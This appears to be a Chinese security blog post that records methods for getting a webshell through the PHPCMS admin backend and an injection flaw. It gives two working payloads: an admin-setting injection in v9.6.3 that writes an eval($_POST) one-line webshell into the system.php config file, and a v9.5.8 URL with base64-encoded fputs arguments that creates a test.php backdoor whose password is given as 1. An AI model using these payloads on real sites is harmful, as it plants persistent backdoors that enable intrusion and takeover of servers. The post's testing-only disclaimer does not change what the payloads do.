今天所做的努力
都是在为明天积蓄力量

phpcms后台getshell

今天在处理phpcms挂马的时候遇到一个一句话木马cachesconfigssystem.php  \',@eval/**/($_POST[123]),// 想了一下这个应该是网站后台写入配置文件,就网上找了一下getshell方法,记录一下

内容仅供测试使用,请遵守网络安全

v9.6.3

安装完后登陆后台
http://127.0.0.1/phpcms/index.php?m=admin&c=index&a=login
981809-20200103212509347-1740003412

后台 - 设置 - connect
981809-20200103212516930-2116884493

在此处插入 \',@@eval($_POST[123]),//,闭合掉 phpcmscachesconfigssystem.php 这里的 key 参数会将一句话木马写入 system.php 文件。
981809-20200103212524173-1539821965

访问:
981809-20200103212531510-1094272870

v9.5.8

http://localhost/phpcms/index.php?m=content&c=content&a=public_sub_categorys&menuid=${@fputs(fopen(base64_decode(Y2FjaGVzL2NhY2hlc19tb2RlbC9jYWNoZXNfZGF0YS90ZXN0LnBocA==),w),base64_decode(PD9waHAgdmFyX2R1bXAobWQ1KHh6KSk7JGNvbnRlbnQ9c3RyaXBzbGFzaGVzKCRfUE9TVFsxXSk7ZXZhbCgkY29udGVudCk7))}&f=

会生成 /caches/caches_model/caches_data/test.php 一句话
密码 1

赞(0)
未经允许不得转载:如需转载,请标注内容来源流觞 » phpcms后台getshell
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

今天所做的努力都是在为明天积蓄力量

联系我们关于小站